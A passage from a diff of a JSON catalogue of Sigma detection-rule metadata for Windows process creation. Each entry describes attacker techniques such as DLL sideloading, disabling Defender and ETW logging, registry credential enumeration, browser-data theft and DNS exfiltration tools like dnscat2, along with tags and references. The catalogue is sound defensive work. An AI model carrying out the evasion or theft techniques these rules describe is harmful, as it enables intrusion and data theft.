"frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.HxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program 
Files\". Its path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\". Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe", + "uuid": "4e762605-34a8-406d-b72e-c1a089313320", + "value": "Detecting Fake Instances Of Hxtsr.exe", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_detecting_fake_instances_of_hxtsr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "creation_date": "2020/04/17", + "filename": "proc_creation_win_detecting_fake_instances_of_hxtsr.yml", + "author": "Sreeman", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that doesnt exist. This non-existent DLL file is named \"ShellChromeAPI.dll\". 
\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "uuid": "e173ad47-4388-4012-ae62-bd13f71c18a8", + "value": "DLL Sideloading via DeviceEnroller.exe", + "meta": { + "refs": [ + "https://mobile.twitter.com/0gtweet/status/1564131230941122561", + "https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_deviceenroller_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2022/08/29", + "filename": "proc_creation_win_deviceenroller_evasion.yml", + "author": "@gott_cyber", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", + "uuid": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "value": "DInject PowerShell Cradle CommandLine Flags", + "meta": { + "refs": [ + "https://github.com/snovvcrash/DInjector", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dinjector.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ], + "creation_date": "2021/12/07", + "filename": "proc_creation_win_dinjector.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of DirLister.exe", + "uuid": "b4dc61f5-6cce-468e-a608-b48b469feaa2", + "value": "Launch DirLister Executable", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dirlister.yml" + ], + 
"tags": [ + "attack.discovery", + "attack.t1083" + ], + "creation_date": "2022/08/20", + "filename": "proc_creation_win_dirlister.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects attackers attempting to disable Windows Defender using Powershell", + "uuid": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "value": "Disable Windows Defender AV Security Monitoring", + "meta": { + "refs": [ + "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", + "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_defender_av_security_monitoring.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2020/10/12", + "filename": "proc_creation_win_disable_defender_av_security_monitoring.yml", + "author": "ok @securonix invrep-de, oscd.community, frack113", + "level": "high", + "falsepositive": [ + "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." 
+ ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when attackers use \"sc.exe\" or the powershell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\"", + "uuid": "85c312b7-f44d-4a51-a024-d671c40b49fc", + "value": "Sc Or Set-Service Cmdlet Execution to Disable Services", + "meta": { + "refs": [ + "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_service.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/08/01", + "filename": "proc_creation_win_disable_service.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Administrators settings a service to disable via script or cli for testing purposes" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", + "uuid": "213d6a77-3d55-4ce8-ba74-fcfef741974e", + "value": "Discover Private Keys", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_discover_private_keys.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ], + "creation_date": "2021/07/20", + "filename": "proc_creation_win_discover_private_keys.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the 
non-default directory which may be an attempt to sideload arbitrary DLL", + "uuid": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "value": "DLL Sideloading by Microsoft Defender", + "meta": { + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2022/08/01", + "filename": "proc_creation_win_dll_sideload_defender.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "uuid": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "value": "DLL Sideloading by VMware Xfer Utility", + "meta": { + "refs": [ + "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2022/08/02", + "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The PowerShell implementation of DNSCat2 calls nslookup to craft queries. 
Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally.", + "uuid": "b11d75d6-d7c1-11ea-87d0-0242ac130003", + "value": "DNSCat2 Powershell Implementation Detection Via Process Creation", + "meta": { + "refs": [ + "https://github.com/lukebaggett/dnscat2-powershell", + "https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html", + "https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscat2_powershell_implementation.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071", + "attack.t1071.004", + "attack.t1001.003", + "attack.t1041" + ], + "creation_date": "2020/08/08", + "filename": "proc_creation_win_dnscat2_powershell_implementation.yml", + "author": "Cian Heasley", + "level": "high", + "falsepositive": [ + "Other powershell scripts that call nslookup.exe" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects an attempt to add a potentially crafted DLL as a plug in of the DNS Service.\nDetects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain.\nDNS zones used to host the DNS records for a particular domain\n", + "uuid": "b6457d63-d2a2-4e29-859d-4e7affc153d1", + "value": "Discovery/Execution via dnscmd.exe", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd", + "https://docs.microsoft.com/en-us/azure/dns/dns-zones-records", + "https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1543.003" + ], + "creation_date": "2022/07/31", + "filename": "proc_creation_win_dnscmd_discovery.yml", + "author": 
"@gott_cyber", + "level": "medium", + "falsepositive": [ + "Legitimate administration use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Well-known DNS Exfiltration tools execution", + "uuid": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "value": "DNS Exfiltration and Tunneling Tools Execution", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1132.001" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate usage of iodine or dnscat2 \u2014 DNS Exfiltration tools (unlikely)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", + "uuid": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "value": "DNS ServerLevelPluginDll Install", + "meta": { + "refs": [ + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_serverlevelplugindll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" + ], + "creation_date": "2017/05/08", + "filename": "proc_creation_win_dns_serverlevelplugindll.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "dotnet.exe will execute any DLL and 
execute unsigned code", + "uuid": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", + "value": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/", + "https://twitter.com/_felamos/status/1204705548668555264", + "https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnet.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ], + "creation_date": "2020/10/18", + "filename": "proc_creation_win_dotnet.yml", + "author": "Beyu Denis, oscd.community", + "level": "medium", + "falsepositive": [ + "System administrator Usage" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of Dsacls to grant over permissive permissions", + "uuid": "01c42d3c-242d-4655-85b2-34f1739632f7", + "value": "Abusing Permissions Using Dsacls", + "meta": { + "refs": [ + "https://ss64.com/nt/dsacls.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ], + "creation_date": "2022/06/20", + "filename": "proc_creation_win_dsacls_abuse_permissions.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate administrators granting over permissive permissions to users" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects possible password spraying attempts using Dsacls", + "uuid": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", + "value": "Password Spraying Attempts Using Dsacls", + "meta": { + "refs": [ + 
"https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone", + "https://ss64.com/nt/dsacls.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ], + "creation_date": "2022/06/20", + "filename": "proc_creation_win_dsacls_password_spray.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of dsacls to bind to an LDAP session" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", + "uuid": "43e32da2-fdd0-4156-90de-50dfd62636f9", + "value": "Dism Remove Online Package", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism", + "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsim_remove.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/01/16", + "filename": "proc_creation_win_dsim_remove.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate script" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", + "uuid": 
"4f647cfa-b598-4e12-ad69-c68dd16caef8", + "value": "DumpStack.log Defender Evasion", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1479094189048713219", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpstack_log_evasion.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/01/06", + "filename": "proc_creation_win_dumpstack_log_evasion.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects email exfiltration via powershell cmdlets", + "uuid": "312d0384-401c-4b8b-abdf-685ffba9a332", + "value": "Email Exifiltration Via Powershell", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", + "https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml" + ], + "tags": [ + "attack.exfiltration" + ], + "creation_date": "2022/09/09", + "filename": "proc_creation_win_email_exfil_via_powershell.yml", + "author": "Nasreddine Bencherchali (rule), Azure-Sentinel (idea)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects events that appear when a user click on a link file with a powershell command in it", + "uuid": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", + "value": "Hidden Powershell in Link File Pattern", + "meta": { + "refs": [ + "https://www.x86matthew.com/view_post?id=embed_exe_lnk", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_embed_exe_lnk.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/02/06", + "filename": "proc_creation_win_embed_exe_lnk.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate commands in .lnk files" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a base64 encoded FromBase64String keyword in a process command line", + "uuid": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "value": "Encoded FromBase64String", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_encoded_frombase64string.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/08/24", + "filename": "proc_creation_win_encoded_frombase64string.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a base64 encoded IEX command string in a process command line", + "uuid": "88f680b8-070e-402c-ae11-d2914f2257f1", + "value": "Encoded IEX", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_encoded_iex.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/08/23", + "filename": "proc_creation_win_encoded_iex.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", + "uuid": "87a476dc-0079-4583-a985-dee7a20a03de", + "value": 
"Enumeration for 3rd Party Creds From CLI", + "meta": { + "refs": [ + "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", + "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", + "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.002" + ], + "creation_date": "2022/06/20", + "filename": "proc_creation_win_enumeration_for_credentials_cli.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", + "uuid": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", + "value": "Enumeration for Credentials in Registry", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_in_registry.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.002" + ], + "creation_date": "2021/12/20", + "filename": "proc_creation_win_enumeration_for_credentials_in_registry.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + 
"logsource.product": "windows" + } + }, + { + "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", + "uuid": "6a69f62d-ce75-4b57-8dce-6351eb55b362", + "value": "Esentutl Steals Browser Information", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + "https://redcanary.com/threat-detection-report/threats/qbot/", + "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005" + ], + "creation_date": "2022/02/13", + "filename": "proc_creation_win_esentutl_webcache.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "uuid": "41421f44-58f9-455d-838a-c398859841d4", + "value": "COMPlus_ETWEnabled Command Line Arguments", + "meta": { + "refs": [ + "https://twitter.com/_xpn_/status/1268712093928378368", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + 
"https://bunnyinside.com/?term=f71e8cb9c76a", + "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_modification_cmdline.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ], + "creation_date": "2020/05/02", + "filename": "proc_creation_win_etw_modification_cmdline.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", + "uuid": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", + "value": "Disable of ETW Trace", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", + "https://abuse.io/lockergoga.txt", + "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_trace_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" + ], + "creation_date": "2019/03/22", + "filename": "proc_creation_win_etw_trace_evasion.yml", + "author": "@neu5ron, Florian Roth, Jonhnathan Ribeiro, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). 
The adversary may then perform actions as the logged-on user.", + "uuid": "a197e378-d31b-41c0-9635-cfdf1c1bb423", + "value": "WinRM Access with Evil-WinRM", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm", + "https://github.com/Hackplayers/evil-winrm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_evil_winrm.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.006" + ], + "creation_date": "2022/01/07", + "filename": "proc_creation_win_evil_winrm.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default.", + "uuid": "344482e4-a477-436c-aa70-7536d18a48c7", + "value": "Execution via MSSQL Xp_cmdshell Stored Procedure", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/09/28", + "filename": "proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Execution of well known tools for data exfiltration and tunneling", + "uuid": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", + "value": "Exfiltration and Tunneling Tools Execution", + "meta": { + "refs": [ + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.command_and_control", + "attack.t1041", + "attack.t1572", + "attack.t1071.001" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate Administrator using tools" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of various cli utility related to web request exfiltrating data", + "uuid": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "value": "Possible Exfiltration Of Data Via CLI", + "meta": { + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exfil_data_via_cli.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/08/02", + "filename": "proc_creation_win_exfil_data_via_cli.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries can use the inbuilt expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", + "uuid": "9f107a84-532c-41af-b005-8d12a607639f", + "value": "Cabinet File Expansion", + "meta": { + "refs": [ + "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll", + "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ], + "creation_date": "2021/07/30", + "filename": "proc_creation_win_expand_cabinet_files.yml", + "author": "Bhabesh Raj", + "level": "medium", + "falsepositive": [ + "System administrator Usage" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "uuid": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "value": "Exploit for CVE-2015-1641", + "meta": { + "refs": [ + "https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/", + "https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ], + "creation_date": "2018/02/22", + "filename": "proc_creation_win_exploit_cve_2015_1641.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", + "uuid": "864403a1-36c9-40a2-a982-4c9a45f7d833", + "value": "Exploit for CVE-2017-0261", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_0261.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" 
